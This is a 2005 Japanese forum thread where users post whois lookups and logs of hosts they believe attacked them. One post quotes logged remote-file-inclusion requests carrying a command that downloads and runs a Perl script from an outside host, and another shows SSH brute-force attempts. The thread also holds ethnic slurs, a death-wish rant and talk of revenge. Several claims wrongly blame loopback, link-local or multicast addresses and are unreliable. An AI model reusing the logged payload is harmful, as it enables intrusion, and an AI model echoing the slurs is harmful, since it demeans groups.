Updated: 2002-10-14

OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName: Internet Corporation for Assigned Names and Number
OrgAbusePhone: +1-310-301-5820
OrgAbuseEmail: [email protected]

OrgTechHandle: IANA-IP-ARIN
OrgTechName: Internet Corporation for Assigned Names and Number
OrgTechPhone: +1-310-301-5820
OrgTechEmail: [email protected]

# ARIN WHOIS database, last updated 2005-11-19 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
80名無しさん@お腹いっぱい。:2005/11/20(日) 17:12:17
ふぁぁ〜眠い
whoisまでやってエライ
81名無しさん@お腹いっぱい。:2005/11/20(日) 18:16:56
>127.0.0.1←このIPやたら「IP Spoofing」って攻撃してくるんだけど本物のクラッカー?


それってhttp://127.0.0.1/と関係あり
82名無しさん@お腹いっぱい。:2005/11/20(日) 18:33:56
58.89.146.26
83名無しさん@お腹いっぱい。:2005/11/20(日) 18:44:43
>>81
>それってhttp://127.0.0.1/と関係あり

なんですかそれ?
127.0.0.1って同じIPがやたらアクセスブロックされてて
ルータの誤作動?かなにかとも思ってたんですが
84名無しさん@お腹いっぱい。:2005/11/20(日) 18:49:24
>>83
とりあえず、そこのアドレス開いてみ?
「ページを表示できません。」てなればとりあえず良し。
85名無しさん@お腹いっぱい。:2005/11/20(日) 18:58:16
おそらく↓のことかと思われ

異世界からの訪問者『 127.0.0.1 』@セキュリティ板
http://pc8.2ch.net/test/read.cgi/sec/1064122787/
86名無しさん@お腹いっぱい。:2005/11/20(日) 22:38:54
>>84
よくわからないけど表示できませんとなったから大丈夫?なのか
>>85
こんなのあったのか、ありがとう
87名無しさん@お腹いっぱい。:2005/11/21(月) 10:56:18
何この流れ。
88名無しさん@お腹いっぱい。:2005/11/21(月) 13:54:16
NetBIOS210.245.164.161NETBIOS_NS送信UDPNETBIOS_NSLocalHost
NetBIOSwww.naver.co.krNETBIOS_DGM受信UDPNETBIOS_DGMLocalHost

上 割当国 ※ 香港 (HK)
下 韓国

何をされているのかわかりません。
詳しい人教えて下さい。
89名無しさん@お腹いっぱい。:2005/11/21(月) 18:14:39
吉田武仁
90名無しさん@お腹いっぱい。:2005/11/21(月) 19:33:17
IP アドレス 61.121.64.13
ホスト名ntaomr032013.aomr.nt.ftth.ppp.infoweb.ne.jp

しつこい

91名無しさん@お腹いっぱい。:2005/11/22(火) 01:19:49
IPアドレス 221.117.212.123
ホスト名 221x117x212x123.ap221.ftth.ucom.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 北海道
92名無しさん@お腹いっぱい。:2005/11/22(火) 01:39:31
IPアドレス  219.129.21.84
inetnum: 219.128.0.0 - 219.137.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-GD
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20020424
changed: [email protected] 20041207
source: APNIC

このチョンしつこすぎ
93名無しさん@お腹いっぱい。:2005/11/22(火) 01:43:42
それは、チョン ではなく チュン です
94名無しさん@お腹いっぱい。:2005/11/22(火) 02:55:51
221.113.223.195

なんかこのIPの人にトロイ仕掛けられてたらしくて、
さっきまで、接続されてたみたいです。
あわててポート閉じたんだけど。
なんとか仕返しできませんか?

95名無しさん@お腹いっぱい。:2005/11/22(火) 07:21:25
プロバイダーの管理者にログ見せて
ごるあするしかないね。
踏み台にされてるだけでも、損害賠償しないといけないこともある。
「あれ」付けるか、回線にファイヤーウォールかませるといいよ。
96名無しさん@お腹いっぱい。:2005/11/22(火) 08:02:39
IPアドレス 219.189.192.205
ホスト名 YahooBB219189192205.bbtec.net
IPアドレス
割当国 ※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 xDSL
97名無しさん@お腹いっぱい:2005/11/22(火) 13:36:13
これに属するアドレスからの不正アクセス多く、しかも長期間。
inetnum: 61.233.40.0 - 61.233.40.255
netname: CRHbYqS
country: CN
descr: China Railcom Hebei Yangquan Subbranch
descr: Telecommunication Company
descr: Yangquan City,Shanxi Province
admin-c: LQ112-AP
tech-c: LM273-AP
status: ASSIGNED NON-PORTABLE
changed: [email protected] 20030731
mnt-by: MAINT-CN-CRTC
source: APNIC

特に61.233.40.205はポート22でsshの口が開いていることを発見。
98名無しさん@お腹いっぱい。:2005/11/22(火) 15:58:25
IPアドレス 58.80.55.28
ホスト名 58x80x55x28.ap58.ftth.ucom.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光

SCAN-FIN
99名無しさん@お腹いっぱい。:2005/11/22(火) 17:12:17
210.234.206.34

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.234.206.0/24
b. [ネットワーク名] KDDI-NET
f. [組織名] KDDI株式会社
g. [Organization] KDDI Corporation
m. [管理者連絡窓口] JP00000127
n. [技術連絡担当者] JP00000181
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns10.dion.ne.jp
p. [ネームサーバ] dns2.dion.ne.jp
p. [ネームサーバ] ns1.neweb.ne.jp
[割当年月日] 2003/01/27
[最終更新] 2005/07/27 13:53:51(JST)

上位情報
----------
KDDI株式会社 (KDDI CORPORATION)
[割り振り] 210.234.0.0/16
100名無しさん@お腹いっぱい。:2005/11/23(水) 13:48:23
YahooBB221019024226.bbtec.net
101名無しさん@お腹いっぱい。:2005/11/23(水) 15:02:04
IPアドレス 220.0.40.62
ホスト名 YahooBB220000040062.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 静岡県
市外局番 --
接続回線 xDSL



IPアドレス 61.193.77.67
ホスト名 FLH1Aac003.hyg.mesh.ad.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 兵庫県
市外局番 --
接続回線 光
102名無しさん@お腹いっぱい。:2005/11/23(水) 23:06:57
IP アドレス: 61.121.35.37


ポート135と445をずーーーーと狙ってきてるんですけど
日本ですかね、この鬱陶しい人

103名無しさん@お腹いっぱい。:2005/11/23(水) 23:11:58
�IPアドレス��61.121.35.37�
�ホスト名��ntfkok043037.fkok.nt.adsl.ppp.infoweb.ne.jp�
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.121.0.0/18
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2000/12/12
[返却年月日]
[最終更新] 2003/11/07 11:47:32(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 61.121.0.0/17
104名無しさん@お腹いっぱい。:2005/11/23(水) 23:16:06
�IPアドレス��61.121.54.109�
�ホスト名��nttyma014109.tyma.nt.ftth.ppp.infoweb.ne.jp�
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.121.0.0/18
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2000/12/12
[返却年月日]
[最終更新] 2003/11/07 11:47:32(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 61.121.0.0/17

下位情報
----------
該当するデータがありません。
105名無しさん@お腹いっぱい。:2005/11/23(水) 23:34:00
[20:24:13] <222.208.168.142> (200,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /http/www.search591.com/prx1.php


また中国か・・・多いな・・・
106名無しさん@お腹いっぱい。:2005/11/24(木) 16:29:09
IPアドレス  58.87.242.56
107名無しさん@お腹いっぱい。:2005/11/24(木) 16:32:48
IPアドレス 61.118.154.45
もうさっきから一時間以上来てるこれで20回目だよ
uzeeeeeeeeeeeeeeeeeeeeee
108名無しさん@お腹いっぱい。:2005/11/25(金) 09:25:48
inetnum: 202.101.177.128 - 202.101.177.255
netname: CHINANET-ZJ-HU
country: CN
descr: CHINANET-ZJ Huzhou node network
descr: Zhejiang Telecom
admin-c: CZ4-AP
tech-c: CH119-AP
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20050429
mnt-by: MAINT-CHINANET-ZJ
mnt-lower: MAINT-CN-CHINANET-ZJ-HU
source: APNIC
109http://alink2.uic.to/user/lets5go5.html:2005/11/25(金) 09:35:27
110名無しさん@お腹いっぱい。:2005/11/25(金) 11:04:03
2005/11/22(20:40:52) W-SV ns2.e-karnet.net(202.122.19.5) [80] 404 0 "GET /cacti/graph_image.php HTTP/1.1" ( )
2005/11/24(03:30:05) W-SV 211.42.90.126 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )
2005/11/24(03:30:11) W-SV 211.42.90.126 [80] 404 0 "GET /board/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )
2005/11/24(03:30:17) W-SV 211.42.90.126 [80] 404 0 "GET /zboard/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )
2005/11/24(03:30:23) W-SV 211.42.90.126 [80] 404 0 "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )
2005/11/24(03:30:29) W-SV 211.42.90.126 [80] 404 0 "GET /cgi-bin/ikonboard/ikonboard.cgi?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )
111名無しさん@お腹いっぱい。:2005/11/25(金) 13:07:07
IPアドレス 222.100.185.13
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 韓国 (KR)

またかの国か。
112名無しさん@お腹いっぱい。:2005/11/25(金) 17:04:17
<ニダー>
113蟇朱:2005/11/25(金) 17:20:05
DoCoMo/2.0SH901iC(c100;TB;W30H15)
proxy360.docomo.ne.jp
210.136.161.74
DoCoMo/2.0SH901iC(c100;TB;W30H15)
114蟇朱:2005/11/25(金) 17:20:55
DoCoMo/2.0SH901iC(c100;TB;W30H15)
proxy360.docomo.ne.jp
210.136.161.74
DoCoMo/2.0SH901iC(c100;TB;W30H15)
115蟇朱:2005/11/25(金) 17:21:28
DoCoMo/2.0SH901iC(c100;TB;W30H15)
proxy360.docomo.ne.jp
210.136.161.74
DoCoMo/2.0SH901iC(c100;TB;W30H15)
116名無しさん@お腹いっぱい。:2005/11/26(土) 07:14:20
222.158.3.57
117名無しさん@お腹いっぱい。:2005/11/26(土) 07:50:03
>>107
61.118.154.45 のホスト名は p4045-ipbf10sapodori.hokkaido.ocn.ne.jp です。
118名無しさん@お腹いっぱい。:2005/11/26(土) 10:07:27
IPアドレス 80.23.33.194 
ホスト名 host194-33.pool8023.interbusiness.it 
IPアドレス
 割当国 ※ イタリア (IT) 

80番ポートに何用じゃ氏ね
119名無しさん@お腹いっぱい。:2005/11/26(土) 15:48:49
IPアドレス 220.105.156.41
ホスト名 p2041-ipbf06kyoto.kyoto.ocn.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 京都府
市外局番 --
接続回線 光
120名無しさん@お腹いっぱい。:2005/11/26(土) 16:44:44
ホスト名winkだった俺と同じケーブルTVの奴かよw
121名無しさん@お腹いっぱい。:2005/11/26(土) 20:33:51
漏れも先ほど、同じプロバイダの香具師の狙われました。同郷だし、やだなぁ。
122名無しさん@お腹いっぱい。:2005/11/27(日) 12:48:36
achrsm003078.adsl.ppp.infoweb.ne.jp
219.116.60.78
123名無しさん@お腹いっぱい。:2005/11/27(日) 16:39:08
[16:28:15] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:17] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:18] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:19] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:21] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:23] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:26] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:28] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:29] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:31] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:35] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:36] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:37] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -

(*゚∀゚) 今度はイタリアかよ
124名無しさん@お腹いっぱい。:2005/11/27(日) 18:11:50
IPアドレス 221.117.215.132
ホスト名 221x117x215x132.ap221.ftth.ucom.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 北海道
125名無しさん@お腹いっぱい。:2005/11/27(日) 18:19:50
すみません。頻度が多いのですが晒すこともできなくて困ってます。
169.254.31.224
なんですが、無理は承知でお願いします。
126名無しさん@お腹いっぱい。:2005/11/28(月) 01:50:01
219.98.210.62

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.98.192.0/19
b. [ネットワーク名] SO-NET
f. [組織名] SO-Net サービス
g. [Organization] SO-Net Service
m. [管理者連絡窓口] MK2734JP
n. [技術連絡担当者] SW314JP
n. [技術連絡担当者] YO078JP
p. [ネームサーバ] dnss3.so-net.ne.jp
p. [ネームサーバ] dnss4.so-net.ne.jp
p. [ネームサーバ] dnss5.so-net.ne.jp
p. [ネームサーバ] dnss6.so-net.ne.jp
p. [ネームサーバ] dnss7.so-net.ne.jp
[割当年月日] 2002/04/12
[最終更新] 2004/10/13 15:36:55(JST)

上位情報
----------
ソニーコミュニケーションネットワーク株式会社 (Sony Communication Network Corporation)
[割り振り] 219.98.0.0/16
127名無しさん@お腹いっぱい。:2005/11/28(月) 09:16:42
串使って不正アクセスすると、そのまま串の情報が向こうに行くのか?

ダイヤルアップなんで、不正アクセスの脅威なんて知らない俺ガイル。
128名無しさん@お腹いっぱい。:2005/11/28(月) 09:33:05
串は「刺す」が妥当だったか・・・。
129名無しさん@お腹いっぱい。:2005/11/28(月) 09:41:29
何だかいけない事を聞いたかもしれない・・・答えは書かないでくれ。
130名無しさん@お腹いっぱい。:2005/11/28(月) 14:06:05
>>127-129
( ゚Д゚)ポカーン
131名無しさん@お腹いっぱい。:2005/11/28(月) 17:06:39
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.224.160.0/22
b. [ネットワーク名] SAKURA-NET
f. [組織名] さくらインターネット株式会社
g. [Organization] SAKURA Internet Inc.
m. [管理者連絡窓口] KT749JP
n. [技術連絡担当者] HS821JP
n. [技術連絡担当者] KW419JP
p. [ネームサーバ] ns1.dns.ne.jp
p. [ネームサーバ] ns2.dns.ne.jp
[割当年月日] 1998/06/18
[最終更新] 2000/12/14 16:53:28(JST)

上位情報
----------
さくらインターネット株式会社 (SAKURA Internet Inc.)
[割り振り] 210.224.160.0/22

下位情報
----------
該当するデータがありません。



これ何?
132名無しさん@お腹いっぱい。:2005/11/28(月) 22:04:17
見てのとおり
133名無しさん@お腹いっぱい。:2005/11/28(月) 22:13:12
221.184.25.225

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 221.184.0.0/19
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [管理者連絡窓口] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-os001.ocn.ad.jp
p. [ネームサーバ] pns.ocn.ad.jp
[割当年月日] 2003/08/05
[返却年月日]
[最終更新] 2003/08/05 13:52:08(JST)

上位情報
----------
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
[割り振り] 221.184.0.0/13
134名無しさん@お腹いっぱい。:2005/11/28(月) 22:57:56
206.223.151.225

久しぶりにノートン先生がピコピコしてた・・・
何なのよ一体
135名無しさん@お腹いっぱい。:2005/11/29(火) 02:02:19
210.232.49.3

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.232.49.0-210.232.51.255
b. [ネットワーク名] KJPS-NET
f. [組織名] 株式会社キンデン
g. [Organization] KINDEN Co.,LTD.
m. [管理者連絡窓口] YK7511JP
n. [技術連絡担当者] YK7511JP
p. [ネームサーバ] ns1.kjps.net
p. [ネームサーバ] ns2.kjps.net
[割当年月日] 2003/07/11
[最終更新] 2003/07/14 10:32:02(JST)

上位情報
----------
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
[割り振り] 210.232.0.0/16
136名無しさん@お腹いっぱい。:2005/11/29(火) 13:41:31
210.131.38.50

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.131.32.0/19
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 1998/08/21
[最終更新] 2003/11/06 11:08:04(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 210.131.0.0/18
137名無しさん@お腹いっぱい。:2005/11/29(火) 15:38:50
206.223.152.50

遠路はるばるアメリカはネヴァダからいらっしゃーい
138名無しさん@お腹いっぱい。:2005/11/29(火) 16:55:15
206.223.151.225

遠路はるばるアメリカはエヴァダからいr・・・

>>137
おまいもですか!こいつしつこくないですか?3回くらいアクセスあったorz
139名無しさん@お腹いっぱい。:2005/11/29(火) 17:00:06
アンカー間違えましたスマソ;
140名無しさん@お腹いっぱい。:2005/11/29(火) 19:44:41
[19:14:06] <222.92.249.99> (178,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /http/verify.qq.com/getimage

また中国か('A`)
141名無しさん@お腹いっぱい。:2005/11/30(水) 01:25:10
>>137-138
それNISの誤作動。

なんでセキュ板にその対処法のスレが立ってないか不思議だ。
142名無しさん@お腹いっぱい。:2005/11/30(水) 03:45:00
>>141
問題の単純な呪文でググったら、グーグルも”侵入の疑いにより”接続を遮断されたwww
今は、シグネ茶を単一除外にしてるずら。
143名無しさん@お腹いっぱい。:2005/11/30(水) 09:39:14
218.120.204.34

ヤフーBB管理者にログ提出の上、
報告の内容次第では告訴いたします。
144名無しさん@お腹いっぱい。:2005/11/30(水) 16:57:09
[03:10:50] <211.53.110.11> (25,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /sumthin

韓国タソ(*´Д`)ハァハァ
145名無しさん@お腹いっぱい。:2005/11/30(水) 23:10:01
p6130-ipad06otsu.shiga.ocn.ne.jp
この人なんだよwwwいやしつこすぎるんだが・・有名人?
146名無しさん@お腹いっぱい。:2005/12/01(木) 00:02:28
とりあえず法律違反だよなこれ
147名無しさん@お腹いっぱい。:2005/12/01(木) 02:58:42
inetnum: 203.162.0.0 - 203.162.255.255
netname: VNPT-VNNIC-VN
country: VN
descr: Vietnam Posts and Telecommunications (VNPT)
descr: 23 Phan Chu Trinh st., Hanoi capital, Vietnam
admin-c: NXC1-AP
tech-c: KNH1-AP
status: ALLOCATED PORTABLE
changed: [email protected] 20041011
mnt-by: MAINT-VN-VNNIC
mnt-lower: MAINT-VN-VNPT
source: APNIC



↑これなに??
148名無しさん@お腹いっぱい。:2005/12/01(木) 03:05:05
149名無しさん@お腹いっぱい。:2005/12/01(木) 04:24:19
つーかヒントぐらいくれ
150名無しさん@お腹いっぱい。:2005/12/01(木) 08:11:19

Dec 1 06:42:55 *** sshd[15668]: Did not receive identification string from 133.60.107.2
Dec 1 06:45:47 *** sshd[15669]: input_userauth_request: illegal user lpd
Dec 1 06:45:47 *** sshd[15669]: Failed password for illegal user lpd from 133.60.107.2 port 60934 ssh2
Dec 1 06:45:47 *** sshd[15669]: Received disconnect from 133.60.107.2: 11: Bye Bye
(略)
Dec 1 06:57:01 *** sshd[16521]: input_userauth_request: illegal user muonline
Dec 1 06:57:01 *** sshd[16521]: Failed password for illegal user muonline from 133.60.107.2 port 37684 ssh2
Dec 1 06:57:01 *** sshd[16521]: Received disconnect from 133.60.107.2: 11: Bye Bye

ここのところ ssh のパスワード探しがまた増えてきたなぁ。
殆どが中韓だけど、珍しく国内からのお客さん。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 133.60.0.0/16
b. [ネットワーク名] HIROIN
f. [組織名] 弘前大学
g. [Organization] Hirosaki University
m. [管理者連絡窓口] MF3045JP
n. [技術連絡担当者] HM006JP
n. [技術連絡担当者] KS7358JP
p. [ネームサーバ] dash.cc.hirosaki-u.ac.jp
p. [ネームサーバ] moya.gw.hirosaki-u.ac.jp
p. [ネームサーバ] slash.cc.hirosaki-u.ac.jp
[割当年月日]
[返却年月日]
[最終更新] 2005/03/08 18:02:02(JST)
151名無しさん@お腹いっぱい。:2005/12/01(木) 10:03:57
>150
踏み台の可能性も高いんでね?
152名無しさん@お腹いっぱい。:2005/12/01(木) 17:39:39
IP:219.125.148.211
HOST:wbcc2s10.ezweb.ne.jp
Agent:KDDI-CA31 UP.Browser/6.2.0.7.3.129 (GUI) MMP/2.0
UTN:05001012917204_ab.ezweb.ne.jp

こいつのメールがスパム、個人的にww
153名無しさん@お腹いっぱい。:2005/12/01(木) 21:47:10
61.125.231.39

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.125.192.0/18
b. [ネットワーク名] ASAHI-NET
f. [組織名] 朝日ネット

書いてる途中に、またいらっしゃいました
219.15.232.108

inetnum: 219.0.0.0 - 219.63.255.255
netname: BBTECH
descr: SOFTBANK BB CORP
descr: Nation wide network in Japan
154名無しさん@お腹いっぱい。:2005/12/02(金) 20:16:43
202.98.123.179
155名無しさん@お腹いっぱい。:2005/12/04(日) 14:39:14
メールボムでも送ってやろうかと思ったらぺーじが表示できませんだってorz
156名無しさん@お腹いっぱい。:2005/12/04(日) 19:26:14
ページ?
勘違いしてないか?
157名無しさん@お腹いっぱい。:2005/12/04(日) 21:29:09
(spamメールが来たから)メールボムでも送ってやろうかと思ったら(リンク先の)ぺーじが表示できませんだってorz

こんなところか?
だったらすれ違いだな。
158157:2005/12/04(日) 21:32:58
スレ違いってより板違いか。
159名無しさん@お腹いっぱい。:2005/12/04(日) 23:58:33
210.175.58.25

[ネットワーク名]KBN-NET
[組織名]香川テレビ放送網株式会社
[Organization]kagawa T.V Broadcast Network Co.,Ltd
[管理者連絡窓口]HM5639JP
[技術連絡担当者]HM5639JP
[ネームサーバ]dns3.odn.ne.jp
[ネームサーバ]ns1.kbn.ne.jp
[ネームサーバ]ns2.kbn.ne.jp
[割当年月日]2002/06/12
[返却年月日]
[最終更新]2002/06/24 10:34:23(JST)

一瞬ケーブルか?と思いきや・・・
160名無しさん@お腹いっぱい。:2005/12/05(月) 10:40:52
2005/12/01〜12/04まで不正アクセスの類が一つもなかった。(/GETとかもない)
珍しいこともあるものだ。
161名無しさん@お腹いっぱい。:2005/12/06(火) 14:32:06
IPアドレス 222.96.154.156 
ホスト名 対応するホスト名がありません 
IPアドレス
 割当国 ※ 韓国 (KR) 

特定アジアは氏ね
162名無しさん@お腹いっぱい。:2005/12/06(火) 17:23:02
210.235.234.95


Non-authoritative answer:
95.234.235.210.in-addr.arpa name = dr95.opt2.point.ne.jp.

Authoritative answers can be found from:
234.235.210.in-addr.arpa nameserver = ns.dti.ad.jp.
234.235.210.in-addr.arpa nameserver = ns2.dti.ad.jp.


dr95.opt2.point.ne.jp

163名無しさん@お腹いっぱい。:2005/12/06(火) 21:38:20
YahooBB219184048022.bbtec.net
屑だ
164名無しさん@お腹いっぱい。:2005/12/06(火) 22:16:02
ノートン先生が怒ったんだが

侵入を検出して遮断しました。news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。

にちゃんが攻撃しかけてきた???
165名無しさん@お腹いっぱい。:2005/12/07(水) 00:29:33
210.228.173.161

[IPネットワークアドレス] 210.228.173.0-210.228.176.255
[ネットワーク名]MOMOTAROUNET
[組織名]Momoたろうインターネットクラブ(日本晃伸株式会社)
[Organization]Momotarou Internet Club (NIHONKOUSHIN Co.)
[管理者連絡窓口]ST182JP
[技術連絡担当者]ST182JP
[ネームサーバ]ns1.mmtr.or.jp
[ネームサーバ]ns2.mmtr.or.jp
[割当年月日]1998/12/08
[返却年月日]
[最終更新]2003/04/10 14:57:05(JST)

おそらく踏み台にされているな。
でも、三日に一回のペースでサーバー障害を起こしている
プロバイダって・・・
166名無しさん@お腹いっぱい。:2005/12/07(水) 02:29:39
>>164
串かどうか2chが確認するためにポートスキャンしてきただけ。
167名無しさん@お腹いっぱい。:2005/12/07(水) 21:58:07
IPアドレス 59.128.182.206

結構前からチクチクやってくる。
こういうのはISPに苦情出してもいいんだろうか?
168名無しさん@お腹いっぱい。:2005/12/08(木) 15:46:01
218.7.208.64 - 218.7.208.71
netname: HEGANG-TEACHER-COLLEGE
descr: He gang city teacher college
country: CN
admin-c: BG63-AP
tech-c: BG63-AP
changed: [email protected] 20030610

これって昔の日本の師範学校みたいな所からのからの攻撃じゃないのw
ちょwwwwwwwwwwwwwwwwwwww
学校の先生の卵がクラッキングとはw
169名無しさん@お腹いっぱい。:2005/12/08(木) 20:56:39
inetnum: 220.184.0.0 - 220.184.255.255
netname: CHINANET-ZJ-HZ
country: CN
descr: CHINANET-ZJ Hangzhou node network
descr: Zhejiang Telecom
admin-c: CZ4-AP
tech-c: CH122-AP
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20050429
170名無しさん@お腹いっぱい。:2005/12/08(木) 21:42:11
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.151.216.0/22
b. [ネットワーク名] HIMEJICATV
f. [組織名] 姫路ケーブルテレビ株式会社
g. [Organization] HIMEJI CABLE TELEVISION CORPORATION
m. [管理者連絡窓口] SN2184JP
n. [技術連絡担当者] SN2184JP
p. [ネームサーバ] ns05.mesh.ad.jp
p. [ネームサーバ] ns1.winknet.ne.jp
p. [ネームサーバ] ns2.winknet.ne.jp
[割当年月日] 2002/09/26
171名無しさん@お腹いっぱい。:2005/12/08(木) 21:47:40
OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

物凄い攻撃受けてるんだけど
172名無しさん@お腹いっぱい。:2005/12/09(金) 01:42:59
>>171
↑そこ、昔私のPCを執拗に攻撃してきた奴だと思う。
プロバイダーA○L使ってるとそこから執拗に攻撃受けるよ・・・・・
173晒し上げ:2005/12/09(金) 03:18:22
>>171-172
お前ら死ね。死ね死ね死ね死ね死ね死ね死ね死ね死ね死んじまえ。
174名無しさん@お腹いっぱい。:2005/12/09(金) 14:52:46
同じぷららの全国のAPから猛烈にアタック食らうんだが。
175名無しさん@お腹いっぱい。:2005/12/09(金) 15:12:07
OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

NetRange: 224.0.0.0 - 239.255.255.255
CIDR: 224.0.0.0/4
NetName: MCAST-NET
NetHandle: NET-224-0-0-0-1
176名無しさん@お腹いっぱい。:2005/12/09(金) 20:06:54
>>175
ワロスwwwwwwwwwwwwww
177名無しさん@お腹いっぱい。:2005/12/09(金) 20:33:37
あなたが検索されたアドレス[ 220.97.196.148 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.97.0.0/16
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [管理者連絡窓口] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
[割当年月日] 2002/09/12
[最終更新] 2002/09/12 16:53:08(JST)

上位情報
----------
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
[割り振り] 220.96.0.0/14
178名無しさん@お腹いっぱい。:2005/12/09(金) 21:18:10
softbank219184048022.bbtec.net
179名無しさん@お腹いっぱい。:2005/12/09(金) 21:29:07
219.184.48.22
180名無しさん@お腹いっぱい。:2005/12/09(金) 22:48:45
TCP1025
CN うざい
181名無しさん@お腹いっぱい。:2005/12/09(金) 22:59:37
■TCP1025番ポートに対するアクセスの増加について(12/9)

ttp://www.cyberpolice.go.jp/important/2005/20051209_184920.html
182名無しさん@お腹いっぱい。:2005/12/09(金) 23:17:21
